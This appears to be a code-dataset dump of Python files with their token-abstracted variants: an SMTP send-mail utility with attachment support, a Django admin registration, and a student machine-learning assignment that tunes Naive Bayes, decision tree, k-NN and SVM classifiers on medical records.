'rb') as fp:\n attach = MIMEBase('application', 'octet-stream')\n attach.set_payload(fp.read())\n encoders.encode_base64(attach)\n attach.add_header('Content-Disposition', 'attachment', filename\n =os.path.basename(attachment))\n msg.attach(attach)\n except:\n print('Unable to attach file, error: ', sys.exc_info())\n smtp = smtplib.SMTP(mail_server, mail_port)\n try:\n smtp.sendmail(from_addr, to_addr, msg.as_string())\n except:\n print('Unexpected error:' + str(sys.exc_info()[0]))\n smtp.quit()\n\n\ndef print_help():\n \"\"\"prints a help message\"\"\"\n print(\n \"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\"\n )\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n\n\ndef main():\n \"\"\"main function\"\"\"\n opts, args = getopt(sys.argv[1:], 'hs:f:t:S:b:A:', ['help'])\n attachment = None\n for o, a in opts:\n if o in ('-h', '--help'):\n print_help()\n sys.exit(0)\n elif o == '-s':\n mail_server_string = a\n elif o == '-f':\n from_address = a\n elif o == '-t':\n to_address = a\n elif o == '-S':\n subject = a\n elif o == '-b':\n body = a\n elif o == '-A':\n attachment = a\n else:\n assert False, 'unhandled option'\n if len(opts) < 5:\n print('too few options')\n print_help()\n sys.exit(1)\n if ':' in mail_server_string:\n mail_server, mail_port = mail_server_string.split(':')\n else:\n mail_server = mail_server_string\n mail_port = 25\n send_email(mail_server, mail_port, from_address, to_address, subject,\n body, attachment)\n sys.exit(0)\n\n\ndef send_email(mail_server, mail_port, from_addr, to_addr, subject, body,\n attachment):\n \"\"\"sends email\"\"\"\n print('Sending mail from %s to %s with subject %s and attachment %s' %\n (from_addr, to_addr, subject, attachment))\n mail_server = mail_server\n mail_port = mail_port\n msg = MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = to_addr\n body = MIMEText(body, 'plain')\n msg.attach(body)\n if attachment:\n try:\n with open(attachment, 'rb') as fp:\n attach = MIMEBase('application', 'octet-stream')\n attach.set_payload(fp.read())\n encoders.encode_base64(attach)\n attach.add_header('Content-Disposition', 'attachment', filename\n =os.path.basename(attachment))\n msg.attach(attach)\n except:\n print('Unable to attach file, error: ', sys.exc_info())\n smtp = smtplib.SMTP(mail_server, mail_port)\n try:\n smtp.sendmail(from_addr, to_addr, msg.as_string())\n except:\n print('Unexpected error:' + str(sys.exc_info()[0]))\n smtp.quit()\n\n\ndef print_help():\n \"\"\"prints a help message\"\"\"\n print(\n \"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\"\n )\n\n\n<code token>\n",
"<import token>\n\n\ndef main():\n \"\"\"main function\"\"\"\n opts, args = getopt(sys.argv[1:], 'hs:f:t:S:b:A:', ['help'])\n attachment = None\n for o, a in opts:\n if o in ('-h', '--help'):\n print_help()\n sys.exit(0)\n elif o == '-s':\n mail_server_string = a\n elif o == '-f':\n from_address = a\n elif o == '-t':\n to_address = a\n elif o == '-S':\n subject = a\n elif o == '-b':\n body = a\n elif o == '-A':\n attachment = a\n else:\n assert False, 'unhandled option'\n if len(opts) < 5:\n print('too few options')\n print_help()\n sys.exit(1)\n if ':' in mail_server_string:\n mail_server, mail_port = mail_server_string.split(':')\n else:\n mail_server = mail_server_string\n mail_port = 25\n send_email(mail_server, mail_port, from_address, to_address, subject,\n body, attachment)\n sys.exit(0)\n\n\n<function token>\n\n\ndef print_help():\n \"\"\"prints a help message\"\"\"\n print(\n \"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\"\n )\n\n\n<code token>\n",
"<import token>\n<function token>\n<function token>\n\n\ndef print_help():\n \"\"\"prints a help message\"\"\"\n print(\n \"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\"\n )\n\n\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,879 | d8e914551f84135bd47115a5a632d91fafe13e0c | from django.contrib import admin
from .models import GatewayBeaconModel
class GatewayBeaconAdmin(admin.ModelAdmin):
readonly_fields = ('id',)
admin.site.register(GatewayBeaconModel, GatewayBeaconAdmin)
| [
"from django.contrib import admin\n\nfrom .models import GatewayBeaconModel\n\n\nclass GatewayBeaconAdmin(admin.ModelAdmin):\n readonly_fields = ('id',)\n\n\nadmin.site.register(GatewayBeaconModel, GatewayBeaconAdmin)\n",
"from django.contrib import admin\nfrom .models import GatewayBeaconModel\n\n\nclass GatewayBeaconAdmin(admin.ModelAdmin):\n readonly_fields = 'id',\n\n\nadmin.site.register(GatewayBeaconModel, GatewayBeaconAdmin)\n",
"<import token>\n\n\nclass GatewayBeaconAdmin(admin.ModelAdmin):\n readonly_fields = 'id',\n\n\nadmin.site.register(GatewayBeaconModel, GatewayBeaconAdmin)\n",
"<import token>\n\n\nclass GatewayBeaconAdmin(admin.ModelAdmin):\n readonly_fields = 'id',\n\n\n<code token>\n",
"<import token>\n\n\nclass GatewayBeaconAdmin(admin.ModelAdmin):\n <assignment token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<code token>\n"
] | false |
99,880 | f7885188b4636a70cb47ef0ab1b4a9fbbe4b2670 | '''
Scaffolding code for the Machine Learning assignment.
You should complete the provided functions and add more functions and classes as necessary.
Write a main function that calls the different functions to perform the required tasks
and repeat your experiments.
'''
'''
INSTRUCTIONS:
- Simply running the code as is will work, no actions required as long
as the dataset is in the same directory as this file.
TO CHANGE DATASETS:
- scroll all the way down to the main function and
change "path_to_data"
- the class label names should also be changed to reflect those
in the new dataset - the code handles two, binary class labels.
TO CHANGE TRAIN-TEST RATIO:
- scroll to main, change "test_set_ratio"
TO CHANGE HYPERPARAMETERS:
- go into each build_AB_classifier function
and change the dict variable called "params". Both param name and
values/ranges can be changed, and the rest of the code will handle
this change totally fine.
TO CHANGE THE RE-FIT METRIC:
- this metric determines how the hyperparameter search (GridSearchCV)
picks the best set of hyperparameter values.
- it can be changed by going into each classifier function and
changing "refit" parameter passed to GridSearchCV
- the rest of the code will handle this change without any more action
required
TO CHANGE THE SCORING METRICS:
- as long as the refit metric is included here, each classifier
function can have GridSearchCV performance reported on any metrics
desired
- they can even be different between classifiers
- scroll to the classifier function and enter string names of the
metrics desired into the GridSearchCV list parameter labelled
"scoring"
- the rest of the code will handle this change.
Nothing else should have to be changed.
'''
import numpy as np
import matplotlib.pyplot as plt
from sklearn import naive_bayes, neighbors, tree, svm, model_selection, metrics
import warnings
import time
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# REQUIRED FUNCTIONS
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def my_team():
'''
Return the list of the team members of this assignment submission as a list
of triplet of the form (student_number, first_name, last_name)
'''
return [ (10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt') ]
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def prepare_dataset(dataset_path):
'''
Read a comma separated text file where
- the first field is a ID number
- the second field is a class label 'B' or 'M'
- the remaining fields are real-valued
Return two numpy arrays X and y where
- X is two dimensional. X[i,:] is the ith example
- y is one dimensional. y[i] is the class label of X[i,:]
y[i] should be set to 1 for 'M', and 0 for 'B'
@param dataset_path: full path of the dataset text file
@return
X,y
'''
# Read the file elements (separated by commas) into a np array.
file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')
# Store the file's shape as variables to use later.
num_examples = file_as_array.shape[0]
num_features = file_as_array.shape[1]
# Create an array to store all file data except the class labels (col 1).
X = np.zeros((num_examples, num_features-1)) #dtype = float (default)
X[:,0] = file_as_array.copy()[:,0] #automatically converts to floats
X[:,1:] = file_as_array[:,2:]
# Create a 1D array to store all the class labels ('B' or 'M').
y = np.zeros_like(file_as_array[:,1], dtype=int)
for i in range(len(y)):
# Store a binary 1 for M, 0 for B
y[i] = (file_as_array[i,1]=='M')
return X,y
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def build_NB_classifier(X_training, y_training):
'''
Build a Naive Bayes classifier based on the training set X_training,
y_training, optimized for the hyperparameters passed.
@param
X_training: X_training[i,:] is the ith example
y_training: y_training[i] is the class label of X_training[i,:]
@return
nbc: the naive bayes classifier built in this function
results: the dict of scores returned by cross validation, since
GridSearchCV would also return this but it cannot be used for
NB with no hyperparameter to optimize, and CV must be done before
fitting takes place (and fitting happens here)
'''
print_clf_intro("NAIVE BAYES")
# Instantiate a Multinomial NB classifier.
nbc = naive_bayes.MultinomialNB()
# Perform cross validation and store results.
results = model_selection.cross_validate(nbc, X_training, y_training,
return_train_score=True,
scoring=['accuracy',
'precision',
'roc_auc',
'recall',
'f1'])
# Fit the data with X-training.
nbc.fit(X_training, y_training)
# Return the classifier object and CV results.
return nbc, results
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def build_DT_classifier(X_training, y_training):
'''
Build a Decision Tree classifier based on the training set X_training,
y_training, optimized for the hyperparameters passed.
@param
X_training: X_training[i,:] is the ith example
y_training: y_training[i] is the class label of X_training[i,:]
@return
dtc: the decision tree classifier built in this function (i.e. a
GridSearchCV object that is usable exactly as a clf object, but
allows access to scores from HP optimization)
'''
# HYPERPARAMTER TO OPTIMIZE: NAME AND TEST RANGE
params = { 'max_depth': np.linspace(1,100,100, dtype=int) }
print_clf_intro("DECISION TREE", params)
# Instantiate a GridSearchCV object of Decision Tree classifier type.
# Pass an int to random_state to ensure repeatability.
dtc = model_selection.GridSearchCV( tree.DecisionTreeClassifier(random_state=5),
params,
return_train_score=True,
# cv=4, #use default 3 or uncomment
scoring=['accuracy',
'roc_auc',
'precision',
'recall',
'f1'],
refit='roc_auc'
)
# Fit the data, which will run k-fold cross-validation on X_training.
with warnings.catch_warnings():
# Prevent warnings from printing (and ruining all my nice formatting!!)
# Warnings tell us that some precision values are zero, but they are
# for parameter values that are BAD and wont be used anyways, so it
# isnt an issue but we still need to test them in GridSearchCV.
warnings.simplefilter("ignore")
dtc.fit(X_training, y_training)
# Return the GridSearchCV object, which automatically uses the best
# estimator for predictions, but also allows access to cv_results_.
return dtc
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def build_NN_classifier(X_training, y_training):
'''
Build a Nearrest Neighbours classifier based on the training set X_training,
y_training, optimized for the hyperparameters passed.
@param
X_training: X_training[i,:] is the ith example
y_training: y_training[i] is the class label of X_training[i,:]
@return
knn: the k-nearest neighbors classifier built in this function (i.e. a
GridSearchCV object that is usable exactly as a clf object, but
allows access to scores from HP optimization)
'''
# HYPERPARAMETER TO OPTIMIZE: NAME AND TEST RANGE
params = { 'n_neighbors': np.linspace(1,200, 200, dtype=int) }
print_clf_intro("NEAREST NEIGHBOR", params)
# Instantiate a GridSearchCV object of KNN classifier type.
knn = model_selection.GridSearchCV( neighbors.KNeighborsClassifier(),
params,
return_train_score=True,
# cv=4, #use default 3 or uncomment
scoring=['accuracy',
'roc_auc',
'precision',
'recall',
'f1'],
refit='roc_auc'
)
# Fit the data, which will run k-fold cross-validation on X_training.
with warnings.catch_warnings():
# Prevent warnings from printing (and ruining all my nice formatting!!)
# Warnings tell us that some precision values are zero, but they are
# for parameter values that are BAD and wont be used anyways, so it
# isnt an issue but we still need to test them in GridSearchCV.
warnings.simplefilter("ignore")
knn.fit(X_training, y_training)
# Return the GridSearchCV object, which automatically uses the best
# estimator for predictions, but also allows access to cv_results_.
return knn
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def build_SVM_classifier(X_training, y_training):
'''
Build a Support Vector Machine classifier based on the training set X_training, y_training.
@param
X_training: X_training[i,:] is the ith example
y_training: y_training[i] is the class label of X_training[i,:]
@return
svm: the svm classifier built in this function (i.e. a GridSearchCV
object that is usable exactly as a clf object, but allows access
to scores from HP optimization)
'''
# HYPERPARAMETER TO OPTIMIZE: NAME AND TEST RANGE
params ={ 'gamma': np.logspace(-10, 1, 100) }
print_clf_intro("SUPPORT VECTOR MACHINE", params)
# Instantiate a GridSearchCV object of SVC classifier type.
svc = model_selection.GridSearchCV( svm.SVC(), #to allow neg_log_loss
params,
return_train_score=True,
# cv=4, #use default of 3, or uncomment
scoring=['accuracy',
'roc_auc',
'precision',
'recall',
'f1', ],
refit='roc_auc'
)
# Fit the data, which will run k-fold cross-validation on X_training.
with warnings.catch_warnings():
# Prevent warnings from printing (and ruining all my nice formatting!!)
# Warnings tell us that some precision values are zero, but they are
# for parameter values that are BAD and wont be used anyways, so it
# isnt an issue but we still need to test them in GridSearchCV.
warnings.simplefilter("ignore")
svc.fit(X_training, y_training)
# Return the GridSearchCV object, which automatically uses the best
# estimator for predictions, but also allows access to cv_results_.
return svc
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# ADDITIONAL FUNCTIONS
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def print_prediction_report(y_pred, y_true, names):
'''
Return a bunch of statistics and metrics reporting the performance of a
certain classifier model on the given training data.
@param:
y_true: A np-array of the target class labels as integers
y_pred: A np-array of the classifier-predicted class labels as integers
names: A tuple of the class labels (str), corresponding to (1,0)
binary integer class labels
@return:
None. Print to console.
'''
labels = (1,0)
# Confusion matrix.
print('\nConfusion Matrix:')
cm = metrics.confusion_matrix(y_true, y_pred, labels)
assert len(names)==len(cm)
assert cm.shape == (2,2)
print('{:14} {:10} {:10} {:3}'.format('PREDICTED:',names[0], names[1], 'All'))
print("ACTUAL: ")
print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm[0,0], '','(FN)', cm[0,1], sum(cm[0])))
print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm[1,0], '','(TN)', cm[1,1], sum(cm[1])))
print('{:14} {:8} {:10} {:5}'.format('All',sum(cm[:,0]), sum(cm[:,1]), sum(sum(cm))))
# Classification report.
print("\nClassification Report:")
print(metrics.classification_report(y_true, y_pred, labels, target_names=names))
# Miscellaneous metrics.
print("\nOverall Metrics:")
print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true, y_pred) ))
print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true, y_pred) ))
print('{:14} {:.2f}'.format('precision:', metrics.precision_score(y_true, y_pred) ))
print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true, y_pred) ))
print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred) ))
print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true, y_pred) ))
print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true, y_pred) ))
print('{:14} {:.2f}'.format('variance:', metrics.explained_variance_score(y_true, y_pred) ))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def print_cv_report(r):
'''
Print nicely formatted statistics from GridSearchCV results. This includes
the mean and std statistics for all scores used (2), on both training and
test data (known as validation dataset).
@param:
results: a dict of results from running sklearn.model_selection.cross_validate,
scored by accuracy, roc_auc, precision and recall.
@return:
None. Print to console.
'''
score_grid = ["accuracy", "precision", "recall", "f1", "roc_auc"]
# Print title bar.
print("\n\n- - - VALIDATION REPORT - - -")
# Print training and test ("validation") scores on all metrics.
print('\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))
for metric in score_grid:
print('{:12} {:8.2f} {:12.2f}'.format(metric + ':',
np.mean(r['train_%s' % metric]),
np.mean(r['test_%s' % metric] )))
print('\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))
print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def print_grid_search_report(grid):
'''
Print nicely formatted statistics from GridSearchCV results. This includes
the mean and std statistics for all scores used (2), on both training and
test data (known as validation dataset).
@param:
grid: a GridSearchCV object scored by accuracy, roc_auc, precision and
recall, that has been fitted and therefore is available for
access through cv_results_
@return:
None. Print to console.
'''
r = grid.cv_results_
i = grid.best_index_
score_grid = clf.scoring
# Print the parameter optimized and the ideal value found
print("\n\n- - - VALIDATION REPORT - - -")
print("Based on validation {} scores, the best value for hyperparameter '{}' is:\n{}".format(
grid.refit,
list(grid.best_params_.keys())[0],
list(grid.best_params_.values())[0]) )
# For the ideal parameter value, print train and test ("validation") scores
print('\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))
for metric in score_grid:
print('{:12} {:8.2f} {:12.2f}'.format(metric + ':',
r['mean_train_%s' % metric][i],
r['mean_test_%s' % metric][i] ))
print('\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))
print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def plot_grid_search_results(clf):
# Organize data and labels
param_name = list(clf.param_grid.keys())[0]
param_vals = list(clf.param_grid.values())[0]
metrics = clf.scoring
score_grid = []
for name in metrics:
score_grid.append(clf.cv_results_['mean_test_%s' % name])
# Plot the organized data and labels
p = plt
idx=0
for scores in score_grid:
p.plot(param_vals, scores, '-', label=metrics[idx])
idx+=1
# Configure plot and show
p.title("Hyperparameter Optimization by Cross-Validation")
p.xlabel(param_name + " value")
if param_name =='gamma': p.xscale('log')
p.ylabel('average test score')
p.legend(loc="lower right")
p.grid(True)
p.show()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def print_introduction(team_array):
'''
Print a nice introduction to the code being run, including well-formatted
team member list.
@param:
team_array: array of student numbers and names returned form my_team()
@return:
None. Print to console.
'''
print("\n\n***************************************************************")
print(" CAB320 ASSIGNMENT 2: MACHINE LEARNING ")
print("***************************************************************")
print("\nTEAM MEMBERS:")
for person in team_array:
print('{:4} {:4} {:10} {:10}'.format(person[0],':',person[1], person[2]))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def print_clf_intro(name, params=None):
'''
Print a nice introduction to the classifier being tested and used.
@param:
name: string holding the name of the classifier type
params: dict holding the name of the hyperparameter to be optimized
@return:
None. Print to console.
'''
print("\n\n\n\n***************************************************************")
print("* {} CLASSIFIER".format(name))
if(params is not None):
print("\nHyperparameter: " + list(params.keys())[0]) # JUST KEY
print("Values Tested: {} values from {} to {}".format(
len( list(params.values())[0] ),
min( list(params.values())[0] ),
max( list(params.values())[0] ) ) )
print("\nWorking...")
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# MAIN FUNCTION
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == "__main__":
# --------------------- Data-specific variables ----------------------
# Change these as required.
class_labels = ("Malignant", "Benign") #corresponding to (1,0) binary vals
path_to_data = 'medical_records.data'
test_set_ratio = 0.2
# Store a list of all parameters necesary for testing and classification
function_list = [
build_NB_classifier,
build_DT_classifier,
build_NN_classifier,
build_SVM_classifier
]
# ------------------------ Experiment process ------------------------
# Print the team.
print_introduction(my_team())
# Pre-process the dataset.
data, labels = prepare_dataset(path_to_data)
# Split the dataset into the corresponding ratio for crossvalidation.
# Set random_state to a hard-coded number to ensure repeatability.
train_data,test_data,train_labels,test_labels = model_selection.train_test_split(
data, labels, test_size=test_set_ratio, random_state=1)
# Print split information.
print('\n\nTraining set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.format(
(1-test_set_ratio)*100, len(train_data), sum(train_labels), (sum(train_labels)*100)/len(train_data)))
print('Test set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.format(
test_set_ratio*100, len(test_data), sum(test_labels), (sum(test_labels)*100)/len(test_data)))
# Analyze and use each classifier, show results.
for function in function_list:
if function is build_NB_classifier:
# Indicator for NBC.
# Handle this differently, since no optimization is necessary.
t0 = time.time()
clf, cv_results = function(train_data, train_labels)
print_cv_report(cv_results)
else:
# Create appropriate optimized classifier and report VALIDATION metrics.
t0 = time.time()
clf = function(train_data, train_labels)
print_grid_search_report(clf)
plot_grid_search_results(clf)
t1 = time.time()
print("\nCross-validation, optimization, and fitting took {:.6f} seconds total.".format(t1-t0))
# Quantify the classifier's performance on the TRAINING set.
pred_train_labels = clf.predict(train_data)
t2 = time.time()
print("\n\n- - - TRAINING REPORT - - -")
print_prediction_report(pred_train_labels, train_labels, class_labels)
print("\nPrediction on training set took {:.6f} seconds.".format(t2-t1))
# Quantify the classifier's performance on TEST SET.
t3 = time.time()
pred_labels = clf.predict(test_data)
t4 = time.time()
print("\n\n- - - TEST REPORT - - -")
print_prediction_report(pred_labels, test_labels, class_labels)
print("\nPrediction on test set took {:.6f} seconds.".format(t4-t3))
| [
"'''\n\nScaffolding code for the Machine Learning assignment. \n\nYou should complete the provided functions and add more functions and classes as necessary.\n \nWrite a main function that calls the different functions to perform the required tasks \nand repeat your experiments.\n\n'''\n\n\n'''\n INSTRUCTIONS:\n - Simply running the code as is will work, no actions required as long\n as the dataset is in the same directory as this file. \n \n \n TO CHANGE DATASETS: \n - scroll all the way down to the main function and \n change \"path_to_data\"\n - the class label names should also be changed to reflect those\n in the new dataset - the code handles two, binary class labels. \n TO CHANGE TRAIN-TEST RATIO: \n - scroll to main, change \"test_set_ratio\"\n TO CHANGE HYPERPARAMETERS: \n - go into each build_AB_classifier function\n and change the dict variable called \"params\". Both param name and \n values/ranges can be changed, and the rest of the code will handle\n this change totally fine.\n TO CHANGE THE RE-FIT METRIC: \n - this metric determines how the hyperparameter search (GridSearchCV) \n picks the best set of hyperparameter values.\n - it can be changed by going into each classifier function and \n changing \"refit\" parameter passed to GridSearchCV \n - the rest of the code will handle this change without any more action \n required\n TO CHANGE THE SCORING METRICS: \n - as long as the refit metric is included here, each classifier \n function can have GridSearchCV performance reported on any metrics \n desired\n - they can even be different between classifiers\n - scroll to the classifier function and enter string names of the \n metrics desired into the GridSearchCV list parameter labelled\n \"scoring\"\n - the rest of the code will handle this change. \n \n \n Nothing else should have to be changed. \n\n'''\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import naive_bayes, neighbors, tree, svm, model_selection, metrics\nimport warnings \nimport time\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n# REQUIRED FUNCTIONS\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef my_team():\n '''\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n '''\n return [ (10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt') ]\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef prepare_dataset(dataset_path):\n ''' \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n '''\n \n # Read the file elements (separated by commas) into a np array.\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n \n # Store the file's shape as variables to use later.\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n \n # Create an array to store all file data except the class labels (col 1).\n X = np.zeros((num_examples, num_features-1)) #dtype = float (default)\n X[:,0] = file_as_array.copy()[:,0] #automatically converts to floats\n X[:,1:] = file_as_array[:,2:] \n \n # Create a 1D array to store all the class labels ('B' or 'M').\n y = np.zeros_like(file_as_array[:,1], dtype=int)\n for i in range(len(y)):\n # Store a binary 1 for M, 0 for B\n y[i] = (file_as_array[i,1]=='M')\n \n \n return X,y\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef build_NB_classifier(X_training, y_training):\n ''' \n Build a Naive Bayes classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n nbc: the naive bayes classifier built in this function\n results: the dict of scores returned by cross validation, since \n GridSearchCV would also return this but it cannot be used for \n NB with no hyperparameter to optimize, and CV must be done before\n fitting takes place (and fitting happens here)\n '''\n \n print_clf_intro(\"NAIVE BAYES\")\n \n # Instantiate a Multinomial NB classifier.\n nbc = naive_bayes.MultinomialNB()\n \n # Perform cross validation and store results. \n results = model_selection.cross_validate(nbc, X_training, y_training, \n return_train_score=True,\n scoring=['accuracy', \n 'precision', \n 'roc_auc', \n 'recall',\n 'f1'])\n \n # Fit the data with X-training.\n nbc.fit(X_training, y_training)\n \n # Return the classifier object and CV results. \n return nbc, results\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n\ndef build_DT_classifier(X_training, y_training):\n ''' \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n '''\n \n # HYPERPARAMTER TO OPTIMIZE: NAME AND TEST RANGE\n params = { 'max_depth': np.linspace(1,100,100, dtype=int) } \n print_clf_intro(\"DECISION TREE\", params) \n \n # Instantiate a GridSearchCV object of Decision Tree classifier type.\n # Pass an int to random_state to ensure repeatability.\n dtc = model_selection.GridSearchCV( tree.DecisionTreeClassifier(random_state=5), \n params, \n return_train_score=True,\n # cv=4, #use default 3 or uncomment\n scoring=['accuracy',\n 'roc_auc',\n 'precision', \n 'recall',\n 'f1'],\n refit='roc_auc'\n )\n \n # Fit the data, which will run k-fold cross-validation on X_training. \n with warnings.catch_warnings():\n # Prevent warnings from printing (and ruining all my nice formatting!!)\n # Warnings tell us that some precision values are zero, but they are \n # for parameter values that are BAD and wont be used anyways, so it\n # isnt an issue but we still need to test them in GridSearchCV. \n warnings.simplefilter(\"ignore\") \n dtc.fit(X_training, y_training)\n \n # Return the GridSearchCV object, which automatically uses the best \n # estimator for predictions, but also allows access to cv_results_.\n return dtc \n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n\ndef build_NN_classifier(X_training, y_training):\n ''' \n Build a Nearrest Neighbours classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed. \n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n knn: the k-nearest neighbors classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n '''\n \n # HYPERPARAMETER TO OPTIMIZE: NAME AND TEST RANGE\n params = { 'n_neighbors': np.linspace(1,200, 200, dtype=int) } \n print_clf_intro(\"NEAREST NEIGHBOR\", params)\n \n # Instantiate a GridSearchCV object of KNN classifier type.\n knn = model_selection.GridSearchCV( neighbors.KNeighborsClassifier(), \n params, \n return_train_score=True,\n # cv=4, #use default 3 or uncomment\n scoring=['accuracy', \n 'roc_auc',\n 'precision', \n 'recall',\n 'f1'],\n refit='roc_auc'\n ) \n \n # Fit the data, which will run k-fold cross-validation on X_training.\n with warnings.catch_warnings():\n # Prevent warnings from printing (and ruining all my nice formatting!!)\n # Warnings tell us that some precision values are zero, but they are \n # for parameter values that are BAD and wont be used anyways, so it\n # isnt an issue but we still need to test them in GridSearchCV.\n warnings.simplefilter(\"ignore\")\n knn.fit(X_training, y_training)\n \n # Return the GridSearchCV object, which automatically uses the best \n # estimator for predictions, but also allows access to cv_results_.\n return knn\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n\ndef build_SVM_classifier(X_training, y_training):\n ''' \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n '''\n \n # HYPERPARAMETER TO OPTIMIZE: NAME AND TEST RANGE\n params ={ 'gamma': np.logspace(-10, 1, 100) } \n print_clf_intro(\"SUPPORT VECTOR MACHINE\", params)\n \n # Instantiate a GridSearchCV object of SVC classifier type.\n svc = model_selection.GridSearchCV( svm.SVC(), #to allow neg_log_loss \n params, \n return_train_score=True,\n # cv=4, #use default of 3, or uncomment\n scoring=['accuracy', \n 'roc_auc',\n 'precision', \n 'recall',\n 'f1', ],\n refit='roc_auc'\n ) \n \n # Fit the data, which will run k-fold cross-validation on X_training.\n with warnings.catch_warnings():\n # Prevent warnings from printing (and ruining all my nice formatting!!)\n # Warnings tell us that some precision values are zero, but they are \n # for parameter values that are BAD and wont be used anyways, so it\n # isnt an issue but we still need to test them in GridSearchCV.\n warnings.simplefilter(\"ignore\")\n svc.fit(X_training, y_training)\n \n # Return the GridSearchCV object, which automatically uses the best \n # estimator for predictions, but also allows access to cv_results_.\n return svc\n\n# - - - - - - - - - - - - - - - - - 